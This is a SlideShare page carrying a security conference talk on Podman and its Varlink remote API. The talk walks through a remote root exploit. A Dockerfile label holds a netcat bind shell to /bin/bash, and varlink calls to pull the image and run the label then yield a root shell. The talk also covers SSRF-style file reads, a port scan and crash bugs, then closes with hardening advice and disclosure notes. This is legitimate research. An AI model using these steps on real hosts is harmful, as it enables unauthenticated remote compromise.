SlideShare una empresa de Scribd logo
1 de 76
Adventures with Podman and Varlink
Jeremy Brown 10/2019
whoami
(No fancy title/bio today)
• ~decade in the industry
• @ Amazon, Microsoft, Nvidia playing offense, defense whatever … generally
trying to be effective across security domains as well as my own fun research
• Prior published research
• Bugs on many different platforms, clients, servers, drivers, virtual appliances,
cloud, fuzzing, generally exploring and thinking about how to break and/or fix
lots of different stuff, ….
References:
https://packetstormsecurity.com/files/author/6650/
https://www.slideshare.net/JeremyBrown37/presentations
whoami
ok ok if you must you can call me uh…
Senior CEO of Independent Research, Manager et al
Agenda
I. Podman? Varlink?
II. Local and remote attack surface
III. Some bugs and bad configurations
IV. Exploitation
V. Hardening
VI. Conclusion
“You get on the horn, I throw some peanuts at ‘em and we’ll in Des Moines in no time….”
Reference: Tommy Boy (movie)
What is Varlink?
• Newer IPC protocol, implementation and toolset
• JSON based protocol for exchanging messages
• Meant to be an upgrade over D-bus, BUS1, custom proto /w unix sockets, etc
• “plain-text, type-safe, discoverable, self-documenting, remotable, testable,
easy to debug… accessible from any programming environment”
• Not much security chatter on it
• But OSS-fuzz seems to have picked it up recently
References
https://varlink.org
https://github.com/systemd/systemd/tree/master/test/fuzz/fuzz-varlink
What is Varlink?
Reference: https://github.com/varlink/python
What is Varlink?
• A few different components and deployment scenarios
• Clients and services support for many different languages and system setups
• Even can setup a kernel driver to query via device:/dev/org.kernel….stuff
• It does a lot of stuff, but let’s focus on how it fits with Podman
• They integrated Varlink to create ways to do “remote API” functionality
Reference: http://www.projectatomic.io/blog/2018/05/podman-varlink/
What is Podman?
References:
https://www.podman.io
https://www.suse.com/c/podman-on-opensuse/
What is Podman?
• Lots of local podman commands map to varlink remote API methods
• https://github.com/containers/libpod/tree/master/cmd/podman
• https://github.com/containers/libpod/tree/master/pkg/varlinkapi
• Also not much public security research on it
• Only (1) CVE so far
• https://www.cvedetails.com/cve/CVE-2018-10856/
Reference: https://github.com/containers/libpod/
Together by default on Fedora Server
• Podman + Varlink installed out of the box instead of Docker
• Also rumored that RHEL8 will have Podman too
• RedHat and Fedora folks seem to really like it
• Remote services aren’t running by default AFAIK yet
• They can be configured to run in different ways and some projects want or
support listening over the network setups
Reference: https://dwalsh.fedorapeople.org/ReplacingDockerWithPodman.pdf
Focus and !focus
• Focus
• Podman (1.4/1.5) + Varlink integration
• Remote APIs
• Local or remote privilege escalation on the HOST
• !focus
• Container escapes, although these are cool too
So how do I run this thing?
Reference: https://github.com/containers/libpod/issues/3344
Attack Surface
• podman local process running as root
• ACLs say if a unprivileged user can talk to it or not
But I was promised remote?
Attack Surface
• podman listening for connections on localhost or network
• Now that’s a remote API!
Now how do I talk to this thing?
Reference: https://github.com/containers/libpod/blob/master/cmd/podman/varlink/io.podman.varlink
Oh.
Or…
Attack Surface
• Code vs live query look
How do I test this thing?
• dnf install python3-varlink
References:
https://varlink.org/python/
https://blog.tomecek.net/post/recent-news-in-container-tech/
How do I test this thing?
Command line
Let’s look at the API docs
“You had me at hello”
Reference: https://github.com/containers/libpod/blob/master/API.md#ContainerRunlabel
Quick look @ images.go
Reference: https://github.com/containers/libpod/blob/ed3acaecbfeead3b0fef5928e47ecc9f34cd8d5b/utils/utils.go
Uh what’s a label?
Reference: https://podman.io/blogs/2018/12/03/podman-runlabel.html
Ok create a cool Dockerfile
FROM busybox
LABEL run=“nc -l -p 10000 -e /bin/bash”
$ docker build -t imageX .
or other stuff for your reverse jazz…
References:
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
https://i.blackhat.com/USA-19/Thursday/us-19-Edwards-Compendium-Of-Container-Escapes.pdf
And setup a private docker registry to host it
$ docker-compose up
$ docker tag image localhost:5000/imageX
$ docker push localhost:5000/imageX
(edit /etc/containers/registries.conf for testing)
[registries.insecure]
registries = [‘docker-registry:5000’]
See if it works via command line
Wait… why root?
Oh, not that root I guess :’(
amicontained??
Additional reading: https://lwn.net/Articles/532593/
Unless it’s running as root
ami-not-so-contained??
So that means…
• Running podman as root
• You get root
• Running podman as rootless
• You get…. somebody 
So how about that remote API?
# podman --log-level debug varlink --timeout=0 tcp:0.0.0.0:6000
DEBU[0000] Using varlink socket: tcp:0.0.0.0:6000
DEBU[0000] Initializing boltdb state at
/var/lib/containers/storage/libpod/bolt_state.db
DEBU[0000] Using graph driver overlay
DEBU[0000] Using graph root /var/lib/containers/storage
…..
So how about that remote API?
$ varlink call tcp:podman-host:6000/io.podman.ContainerRunlabel
'{"Runlabel": {"image":"docker-registry:5000/image3", "label":"run"}}’
Check one thing real quick
Oh yeah we gotta Pull first
$ varlink call tcp:podman-host:6000/io.podman.PullImage '{"name":"docker-registry:5000/image3"}’
{
"reply": {
"id": "7276ba03be37ab344f17ab5c97209ec1cf397ea43006f441e6a1540c3da4b5b2",
"logs": [
"Copying blob sha256:ee153a04d6837058642958836062f20badf39f558be3e6c7c7773ef7d8301d90n",
"Copying config sha256:7276ba03be37ab344f17ab5c97209ec1cf397ea43006f441e6a1540c3da4b5b2n",
…..
$
Reference: https://github.com/containers/libpod/blob/master/API.md#PullImage
So how about that remote API?
(what we see server side)
…..
DEBU[0312] parsed reference into
"[overlay@/var/lib/containers/storage+/var/run/containers/storage:overlay.
mountopt=nodev,metacopy=on]docker-registry:5000/image3:latest"
DEBU[0312] parsed reference into
"[overlay@/var/lib/containers/storage+/var/run/containers/storage:overlay.
mountopt=nodev,metacopy=on]@7276ba03be37ab344f17a.…"
DEBU[0312] exporting opaque data as blob
"sha256:7276ba03be37ab344f17a…."
All good ;-]
$ nc podman-host 10000
id
uid=0(root) gid=0(root) groups=0(root)
context=unconfined_u:system_r:container_runtime_t:s0-s0:c0.c1023
ls /root
anaconda-ks.cfg
original-ks.cfg
Now time for a quick recap
“DO NOT CONFIGURE YOUR PODMAN WITHOUT AUTH”
There is remote-client now (uses SSH) which makes this
easier & may become the standard way of doing things
Reference: https://github.com/containers/libpod/blob/b32cb4b750842212f8002e030db63e92c6485fdc/docs/tutorials/remote_client.md
Insecure configs
• Listen as privileged on an open ACL unix socket
• Eg. unix:/run/blah where access isn’t restricted
Local command execution
Reference: https://docs.rs/varlink/8.1.0/varlink/
Insecure configs
• Listen on loopback
• Eg. tcp:127.0.0.1:6000
Local command execution
Insecure configs
• Listen on network
• Eg. tcp:0.0.0.0:6000
Remote command execution
Podman is …. new
• Like 2017ish (?) new
• Similar introduction for Varlink actually
• We really don’t know how or where it will be deployed
• What weird secure or insecure ways admins will want to use it
• But there’s an opportunity to get security right before it takes off
And there’s an appetite for remote stuff
Reference: https://github.com/containers/libpod/issues/935
Are devs using it like this?
• Gopodman
• Podman Varlink API client in Go
• And it was built for this exact purpose
Reference: https://github.com/praveenkumar/gopodman
Gopodman
Reference: https://github.com/praveenkumar/gopodman
I can haz
Are there any docs telling you not to?
• Not that I know of :’)
• Podman project should the explicitly document and make known the risk that
remote API over plain TCP is insecure, especially given the set of APIs
available
• Hopefully this research will make a positive impact
What about SSH?
• It does provide advantages over plain Varlink over TCP such as
encrypted connections, built-in auth gateway, etc
• There’s some docs on how to use it… “securely” (?)
Reference: https://podman.io/blogs/2019/01/16/podman-varlink.html
Varlink bridge mode
• Bridge + SSH auth > running it over TCP /w no auth
• But not everyone is doing it this way
Reference: https://varlink.org/FAQ.html
And Varlink isn’t in the business of auth
Reference: https://varlink.org/FAQ.html
Return of Remote API: Trivial API crashes
• Would be remote DoS of podman & some may still work in releases
Reference: https://github.com/containers/libpod/issues?utf8=%E2%9C%93&q=is%3Aissue+api+crash
Interesting APIs
• Here’s a few that made the list
• ImportImage(), LoadImage(), RemoveImage(), SearchImages()
• Also some need an “upgraded connection”
• Attach(), SendFile(), ReceiveFile(), etc
• Probably some fun stuff to do there
Reference: https://varlink.org/FAQ.html
So we can also do stuff like this
We can manipulate server URL requests
via SearchImages()
Even better…
• By appending ‘/’ onto search queries, it parses this to mean we’re
talking to a registry
• And after best effort concatenations….
Let’s try some stuff
> dir traversal for arbitrary cert
consumption
> get server to read arbitrary
local files
> internal/external port scan
Lots of… other code
• Actually part of the code being executed here is in a different project
• https://github.com/containers/image/blob/master/pkg/tlsclientconfig/tlsclie
ntconfig.go#L20
• https://github.com/containers/libpod/blob/master/pkg/registries/registries.g
o
attack surface++
So like various blind file reads, port scan, etc
• Undesired behavior for sure… but more like white elephant bugs
without a full exploit chain
More stuff?
• Crash on malformed API call (looks like null ptr deref; fixed in 1.5.1)
More stuff?
• Panic due to likely trying to operate on data that isn’t there
• Simple empty or missing ‘name’ parameter, or invalid name, etc…
• Other variants too, kinda hard to not crash the server using this API
More Stuff?
Doesn’t check if strings in volume array
are empty or if they match exactly?
Maybe some more API tests or ???
Testing these issues
$ sudo dnf install -t python3-podman-api
(or python3-varlink works too)
• But doesn’t support every single API that we need
“Live”
• We can capture with socat to save the raw API call and then replay it
$ socat TCP-LISTEN:7000 TCP:localhost:6000
{"method":"io.podman.ContainerRunlabel","parameters":{"Runlabel":{"image":
"docker-registry:5000/image3","label":"run"}}}
^^ and then just send it over a regular socket + NULL byte (per spec)
“Live”
pickletime.py
Sharing this data with folks
• Took a little time to find the right people to talk to about the bugs
• Now there is a documented security@ email DL for security comms, but I was
recommended to send the details to RedHat directly
• Initial response re: run label API that they believed the was working as it was
designed….
• Yes, but when you Remote API w/o auth it works unintendedly very well for everyone 
• Expecting some more bug fixes for the API issues and updated docs
and/or runtime flags to mitigate the risks insecure Remote API setup
• At least once crash already fixed in 1.5.1
Discovery
• Look for UNIX sockets you can connect to with Varlink client
$ lsof -U
• Look for loopback or network services that speak the protocol
$ echo -e "{}0" | nc localhost 6000
{"parameters":{"parameter":"method"},"error":"org.varlink.service.InvalidParam
eter"}
Discovery
$ varlink info tcp:podman-host:6000
Vendor: Atomic
Product: podman
Version: 1.5.1
URL: https://github.com/containers/libpod
Interfaces:
org.varlink.service
io.podman
Discovery
Hardening
• ACLs
• Choose mode appropriately on registration (the more restrictive the better)
• Choose the more locked down /run directory vs others less so (not /tmp)
• Privileges
• Run services (or even resolver service) as lower privileged users if possible
(instead of root)
• If not rootless, drop privileges when doing serious stuff with APIs
Hardening
• Remote access
• Do not run Podman over native Varlink using only TCP
• Use SSH (key + password) related methods to protect the connection and
provide auth so not just anyone can pwn ‘n own
• Understand that even /w remote auth, local users may still be able to hit APIs
• Try to always run rootless to mitigate impact of bugs
Conclusion
• Varlink and Podman are still pretty new and need more research
• Security maturity will come with time, hardening efforts and more audits
• Code to test the found issues to be released shortly
• Things can only get better
• For now, if you’re building systems with them, remember to isolate + auth
• More fixes and better security documentation to come
• https://github.com/containers/libpod/commits/master
Reference: https://github.com/containers/libpod/commit/080abfd22228bcc2b254d76aea0636642dd6bccd
FIN
Questions?
jbrown3264 + gmail = com

Más contenido relacionado

La actualidad más candente

Service worker が拓く mobile web の新しいかたち
Service worker が拓く mobile web の新しいかたちService worker が拓く mobile web の新しいかたち
Service worker が拓く mobile web の新しいかたちKinuko Yasuda
 
Project meeting: Android Graphics Architecture Overview
Project meeting: Android Graphics Architecture OverviewProject meeting: Android Graphics Architecture Overview
Project meeting: Android Graphics Architecture OverviewYu-Hsin Hung
 
Cross platform mobile development
Cross platform mobile developmentCross platform mobile development
Cross platform mobile developmentPeter Friese
 
A arquitetura modular do Java 9
A arquitetura modular do Java 9A arquitetura modular do Java 9
A arquitetura modular do Java 9Helder da Rocha
 
Podman, Buildah, and Quarkus - The Latest in Linux Containers Technologies
Podman, Buildah, and Quarkus - The Latest in Linux Containers Technologies Podman, Buildah, and Quarkus - The Latest in Linux Containers Technologies
Podman, Buildah, and Quarkus - The Latest in Linux Containers Technologies Daniel Oh
 
Full session asp net mvc vs aspnet core
Full session asp net mvc vs aspnet coreFull session asp net mvc vs aspnet core
Full session asp net mvc vs aspnet corefizmhd
 
Learning AOSP - Android Linux Device Driver
Learning AOSP - Android Linux Device DriverLearning AOSP - Android Linux Device Driver
Learning AOSP - Android Linux Device DriverNanik Tolaram
 
online shopping
online shopping online shopping
online shopping Ankuj Kumar
 
Step by Step Guide on Lazy Loading in Angular 11
Step by Step Guide on Lazy Loading in Angular 11Step by Step Guide on Lazy Loading in Angular 11
Step by Step Guide on Lazy Loading in Angular 11Katy Slemon
 
Angular components
Angular componentsAngular components
Angular componentsSultan Ahmed
 
Mobile Browser Internal (Blink Rendering Engine)
Mobile Browser Internal (Blink Rendering Engine)Mobile Browser Internal (Blink Rendering Engine)
Mobile Browser Internal (Blink Rendering Engine)Hyungwook Lee
 
Android™組込み開発基礎コース BeagleBoard編
Android™組込み開発基礎コース BeagleBoard編Android™組込み開発基礎コース BeagleBoard編
Android™組込み開発基礎コース BeagleBoard編OESF Education
 
PHP でバイナリ変換プログラミング
PHP でバイナリ変換プログラミングPHP でバイナリ変換プログラミング
PHP でバイナリ変換プログラミングYo Ya
 
Fundamentals of JAVA
Fundamentals of JAVAFundamentals of JAVA
Fundamentals of JAVAKUNAL GADHIA
 

La actualidad más candente (20)

Service worker が拓く mobile web の新しいかたち
Service worker が拓く mobile web の新しいかたちService worker が拓く mobile web の新しいかたち
Service worker が拓く mobile web の新しいかたち
 
Restful api
Restful apiRestful api
Restful api
 
Project meeting: Android Graphics Architecture Overview
Project meeting: Android Graphics Architecture OverviewProject meeting: Android Graphics Architecture Overview
Project meeting: Android Graphics Architecture Overview
 
Cross platform mobile development
Cross platform mobile developmentCross platform mobile development
Cross platform mobile development
 
A arquitetura modular do Java 9
A arquitetura modular do Java 9A arquitetura modular do Java 9
A arquitetura modular do Java 9
 
Podman, Buildah, and Quarkus - The Latest in Linux Containers Technologies
Podman, Buildah, and Quarkus - The Latest in Linux Containers Technologies Podman, Buildah, and Quarkus - The Latest in Linux Containers Technologies
Podman, Buildah, and Quarkus - The Latest in Linux Containers Technologies
 
Full session asp net mvc vs aspnet core
Full session asp net mvc vs aspnet coreFull session asp net mvc vs aspnet core
Full session asp net mvc vs aspnet core
 
Learning AOSP - Android Linux Device Driver
Learning AOSP - Android Linux Device DriverLearning AOSP - Android Linux Device Driver
Learning AOSP - Android Linux Device Driver
 
REST API Authentication Methods.pdf
REST API Authentication Methods.pdfREST API Authentication Methods.pdf
REST API Authentication Methods.pdf
 
online shopping
online shopping online shopping
online shopping
 
Step by Step Guide on Lazy Loading in Angular 11
Step by Step Guide on Lazy Loading in Angular 11Step by Step Guide on Lazy Loading in Angular 11
Step by Step Guide on Lazy Loading in Angular 11
 
Angular components
Angular componentsAngular components
Angular components
 
CROSS PLATFORM APPLICATIONS DEVELOPMENT
CROSS PLATFORM APPLICATIONS DEVELOPMENT CROSS PLATFORM APPLICATIONS DEVELOPMENT
CROSS PLATFORM APPLICATIONS DEVELOPMENT
 
Java Quiz Questions
Java Quiz QuestionsJava Quiz Questions
Java Quiz Questions
 
Mobile Browser Internal (Blink Rendering Engine)
Mobile Browser Internal (Blink Rendering Engine)Mobile Browser Internal (Blink Rendering Engine)
Mobile Browser Internal (Blink Rendering Engine)
 
Podman rootless containers
Podman rootless containersPodman rootless containers
Podman rootless containers
 
Android™組込み開発基礎コース BeagleBoard編
Android™組込み開発基礎コース BeagleBoard編Android™組込み開発基礎コース BeagleBoard編
Android™組込み開発基礎コース BeagleBoard編
 
Project template
Project templateProject template
Project template
 
PHP でバイナリ変換プログラミング
PHP でバイナリ変換プログラミングPHP でバイナリ変換プログラミング
PHP でバイナリ変換プログラミング
 
Fundamentals of JAVA
Fundamentals of JAVAFundamentals of JAVA
Fundamentals of JAVA
 

Similar a Adventures with Podman and Varlink

Security Tips to run Docker in Production
Security Tips to run Docker in ProductionSecurity Tips to run Docker in Production
Security Tips to run Docker in ProductionGianluca Arbezzano
 
MongoDB on CloudFoundry
MongoDB on CloudFoundryMongoDB on CloudFoundry
MongoDB on CloudFoundryYohei Sasaki
 
MongoDB on CloudFoundry
MongoDB on CloudFoundryMongoDB on CloudFoundry
MongoDB on CloudFoundryYohei Sasaki
 
Wi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksWi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksGreg Foss
 
BOX of Illusion MOSEC'17
BOX of Illusion MOSEC'17BOX of Illusion MOSEC'17
BOX of Illusion MOSEC'17Python0x0
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...Zoltan Balazs
 
Building a production-ready, fully-scalable Docker Swarm using Terraform & Pa...
Building a production-ready, fully-scalable Docker Swarm using Terraform & Pa...Building a production-ready, fully-scalable Docker Swarm using Terraform & Pa...
Building a production-ready, fully-scalable Docker Swarm using Terraform & Pa...Outlyer
 
XSS Without Browser
XSS Without BrowserXSS Without Browser
XSS Without Browserkosborn
 
Operating Docker
Operating DockerOperating Docker
Operating DockerJen Andre
 
Docker Security
Docker SecurityDocker Security
Docker Securityantitree
 
13 practical tips for writing secure golang applications
13 practical tips for writing secure golang applications13 practical tips for writing secure golang applications
13 practical tips for writing secure golang applicationsKarthik Gaekwad
 
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Aaron Hnatiw
 
From SaltStack to Puppet and beyond...
From SaltStack to Puppet and beyond...From SaltStack to Puppet and beyond...
From SaltStack to Puppet and beyond...Yury Bushmelev
 
Dependent things dependency management for apple sw - slideshare
Dependent things   dependency management for apple sw - slideshareDependent things   dependency management for apple sw - slideshare
Dependent things dependency management for apple sw - slideshareCavelle Benjamin
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesVolkan Özçelik
 

Similar a Adventures with Podman and Varlink (20)

Security Tips to run Docker in Production
Security Tips to run Docker in ProductionSecurity Tips to run Docker in Production
Security Tips to run Docker in Production
 
MongoDB on CloudFoundry
MongoDB on CloudFoundryMongoDB on CloudFoundry
MongoDB on CloudFoundry
 
MongoDB on CloudFoundry
MongoDB on CloudFoundryMongoDB on CloudFoundry
MongoDB on CloudFoundry
 
Wi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksWi-Fi Hotspot Attacks
Wi-Fi Hotspot Attacks
 
BOX of Illusion MOSEC'17
BOX of Illusion MOSEC'17BOX of Illusion MOSEC'17
BOX of Illusion MOSEC'17
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 
Pp docker-swarm-doxlon-28th-march-2017
Pp docker-swarm-doxlon-28th-march-2017Pp docker-swarm-doxlon-28th-march-2017
Pp docker-swarm-doxlon-28th-march-2017
 
Building a production-ready, fully-scalable Docker Swarm using Terraform & Pa...
Building a production-ready, fully-scalable Docker Swarm using Terraform & Pa...Building a production-ready, fully-scalable Docker Swarm using Terraform & Pa...
Building a production-ready, fully-scalable Docker Swarm using Terraform & Pa...
 
XSS Without Browser
XSS Without BrowserXSS Without Browser
XSS Without Browser
 
Encode polkadot club
Encode polkadot club  Encode polkadot club
Encode polkadot club
 
Operating Docker
Operating DockerOperating Docker
Operating Docker
 
Pyramid faq
Pyramid faqPyramid faq
Pyramid faq
 
Docker Security
Docker SecurityDocker Security
Docker Security
 
13 practical tips for writing secure golang applications
13 practical tips for writing secure golang applications13 practical tips for writing secure golang applications
13 practical tips for writing secure golang applications
 
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016
 
Scrapy
ScrapyScrapy
Scrapy
 
Sonatype DevSecOps Leadership forum 2020
Sonatype DevSecOps Leadership forum 2020Sonatype DevSecOps Leadership forum 2020
Sonatype DevSecOps Leadership forum 2020
 
From SaltStack to Puppet and beyond...
From SaltStack to Puppet and beyond...From SaltStack to Puppet and beyond...
From SaltStack to Puppet and beyond...
 
Dependent things dependency management for apple sw - slideshare
Dependent things   dependency management for apple sw - slideshareDependent things   dependency management for apple sw - slideshare
Dependent things dependency management for apple sw - slideshare
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best Practices
 

Más de Jeremy Brown

Summer of Fuzz: macOS
Summer of Fuzz: macOSSummer of Fuzz: macOS
Summer of Fuzz: macOSJeremy Brown
 
Attacking Big Data Land
Attacking Big Data LandAttacking Big Data Land
Attacking Big Data LandJeremy Brown
 
ProdSec: A Technical Approach
ProdSec: A Technical ApproachProdSec: A Technical Approach
ProdSec: A Technical ApproachJeremy Brown
 
Microsoft Vulnerability Research - How to be a finder as a vendor
Microsoft Vulnerability Research - How to be a finder as a vendorMicrosoft Vulnerability Research - How to be a finder as a vendor
Microsoft Vulnerability Research - How to be a finder as a vendorJeremy Brown
 
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Jeremy Brown
 
Hacking Virtual Appliances
Hacking Virtual AppliancesHacking Virtual Appliances
Hacking Virtual AppliancesJeremy Brown
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device InsecurityJeremy Brown
 
A Bug Hunter's Perspective on Unix Drivers
A Bug Hunter's Perspective on Unix DriversA Bug Hunter's Perspective on Unix Drivers
A Bug Hunter's Perspective on Unix DriversJeremy Brown
 

Más de Jeremy Brown (10)

Provoking Windows
Provoking WindowsProvoking Windows
Provoking Windows
 
Summer of Fuzz: macOS
Summer of Fuzz: macOSSummer of Fuzz: macOS
Summer of Fuzz: macOS
 
Unsecuring SSH
Unsecuring SSHUnsecuring SSH
Unsecuring SSH
 
Attacking Big Data Land
Attacking Big Data LandAttacking Big Data Land
Attacking Big Data Land
 
ProdSec: A Technical Approach
ProdSec: A Technical ApproachProdSec: A Technical Approach
ProdSec: A Technical Approach
 
Microsoft Vulnerability Research - How to be a finder as a vendor
Microsoft Vulnerability Research - How to be a finder as a vendorMicrosoft Vulnerability Research - How to be a finder as a vendor
Microsoft Vulnerability Research - How to be a finder as a vendor
 
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
 
Hacking Virtual Appliances
Hacking Virtual AppliancesHacking Virtual Appliances
Hacking Virtual Appliances
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
A Bug Hunter's Perspective on Unix Drivers
A Bug Hunter's Perspective on Unix DriversA Bug Hunter's Perspective on Unix Drivers
A Bug Hunter's Perspective on Unix Drivers
 

Último

Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxRustici Software
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDropbox
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Orbitshub
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusZilliz
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Victor Rentea
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfOverkill Security
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Zilliz
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Victor Rentea
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 

Último (20)

Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
